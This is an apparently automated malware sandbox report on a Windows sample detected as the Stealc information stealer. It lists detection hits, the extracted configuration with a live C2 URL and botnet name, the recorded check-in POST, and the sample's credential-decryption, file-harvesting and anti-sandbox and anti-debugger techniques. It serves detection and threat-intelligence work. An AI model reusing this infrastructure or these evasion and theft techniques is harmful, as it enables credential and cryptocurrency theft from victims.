
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532474
MD5: 8008a506f397dc8e845a8b9bc62bded1
SHA1: df3448212221cdab90c8f4468b4b61ec4e5a408b
SHA256: 541cd6146cb146b9700ea311b06ee7079a3818dc1dbac4f833c2b90ca17ce8d0
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8008A506F397DC8E845A8B9BC62BDED1)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (network capture):
  Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Yara matches (memory dumps):
  Source: 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: 00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: Process Memory Space: file.exe PID: 1748 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
  Source: Process Memory Space: file.exe PID: 1748 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Yara matches (unpacked PE files):
  Source: 0.2.file.exe.bc0000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata IDS alerts:
  Timestamp: 2024-10-13T10:39:07.755961+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.4 | Source Port: 49730 | Destination IP: 185.215.113.37 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.bc0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/( | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php# | Virustotal: Detection: 18%
Source: http://185.215.113.37// | Virustotal: Detection: 20%
Source: http://185.215.113.37/e2b1563c6670f193.php; | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpl | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpC | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpg | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 38 30 42 30 44 31 33 36 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a
    Data Ascii:
      ------AECAKECAEGDHIECBGHII
      Content-Disposition: form-data; name="hwid"

      2580B0D136AA1106654546
      ------AECAKECAEGDHIECBGHII
      Content-Disposition: form-data; name="build"

      doma
      ------AECAKECAEGDHIECBGHII--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same request headers, raw data and ASCII data as the POST recorded above)
Source: file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1749682268.00000000013F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/(
Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37//
Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37R

System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01095148
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8301E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F89808
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01032829
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7A999
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8B98F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6710A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7F904
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010043CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F76A03
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA13B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F814E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E5B484
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8644C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7EC21
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7C40B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F87DCA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F84D82
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F00EF3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED26DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F18662
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3F6A
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00BC45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: rwxwlxgf ZLIB complexity 0.9949040354330708
Source: file.exe, 00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\WUANH9Q9.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1781760 > 1048576
Source: file.exe | Static PE information: Raw size of rwxwlxgf is bigger than: 0x100000 < 0x18ce00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.bc0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rwxwlxgf:EW;nitsrzzh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rwxwlxgf:EW;nitsrzzh:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1bd610 should be: 0x1bdb03
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: rwxwlxgf
Source: file.exe | Static PE information: section name: nitsrzzh
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01050900 push ecx; mov dword ptr [esp], edx | 0_2_01050904
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01050900 push 4718C9F3h; mov dword ptr [esp], esi | 0_2_01050C12
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01050900 push ebp; mov dword ptr [esp], edi | 0_2_01050C30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100F117 push eax; mov dword ptr [esp], edi | 0_2_0100F168
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE40D0 push esi; mov dword ptr [esp], ecx | 0_2_00FE41A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01095148 push ebp; mov dword ptr [esp], edi | 0_2_010951B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01095148 push ebx; mov dword ptr [esp], esp | 0_2_010951C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01095148 push eax; mov dword ptr [esp], ebp | 0_2_01095229
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01095148 push ebx; mov dword ptr [esp], ecx | 0_2_01095238
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01095148 push eax; mov dword ptr [esp], 236149D1h | 0_2_010952CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push ecx; mov dword ptr [esp], ebx | 0_2_00EE391C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push 2DAE596Bh; mov dword ptr [esp], eax | 0_2_00EE3927
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push esi; mov dword ptr [esp], eax | 0_2_00EE39BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push 1DB743B1h; mov dword ptr [esp], edx | 0_2_00EE39CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push 7E5420BBh; mov dword ptr [esp], edi | 0_2_00EE39D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push 62256DE4h; mov dword ptr [esp], esi | 0_2_00EE39E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push 5796EEC3h; mov dword ptr [esp], edx | 0_2_00EE3A46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push edx; mov dword ptr [esp], 60AA554Ah | 0_2_00EE3A5F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE38AA push ebp; mov dword ptr [esp], eax | 0_2_00EE3AC6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBE8A2 push 1344180Dh; mov dword ptr [esp], edi | 0_2_00FBE8D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0105E977 push 16BA950Fh; mov dword ptr [esp], eax | 0_2_0105E9BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF408B push esi; mov dword ptr [esp], eax | 0_2_00FF40B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF408B push ebx; mov dword ptr [esp], edi | 0_2_00FF40DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDB035 push ecx; ret | 0_2_00BDB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010181B3 push 72D2E081h; mov dword ptr [esp], eax | 0_2_01018248
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010181B3 push ecx; mov dword ptr [esp], edx | 0_2_01018275
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010481CC push 42A870E5h; mov dword ptr [esp], eax | 0_2_0104830F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010481CC push ecx; mov dword ptr [esp], edi | 0_2_01048313
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010481CC push eax; mov dword ptr [esp], ecx | 0_2_0104832A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010949C7 push 36012492h; mov dword ptr [esp], eax | 0_2_01094A14
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010399D5 push 02CBE914h; mov dword ptr [esp], edi | 0_2_01039B5E
Source: file.exe | Static PE information: section name: rwxwlxgf entropy: 7.9545126546693545

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13624
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E222CF second address: E222D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E21BCA second address: E21BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9012D second address: F90131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F90131 second address: F90143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F90143 second address: F90155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Bh 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F90155 second address: F90162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F0A9 second address: F8F0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F230C515288h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F265 second address: F8F26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F26B second address: F8F26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F26F second address: F8F281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F6C1 second address: F8F6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F6C8 second address: F8F6DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F230C5197ACh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F6DA second address: F8F6E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F6E0 second address: F8F72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F230C5197A6h 0x0000000d jmp 00007F230C5197ACh 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F230C5197ACh 0x0000001b pushad 0x0000001c jmp 00007F230C5197B7h 0x00000021 jng 00007F230C5197A6h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8FA12 second address: F8FA19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FA19 second address: F8FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
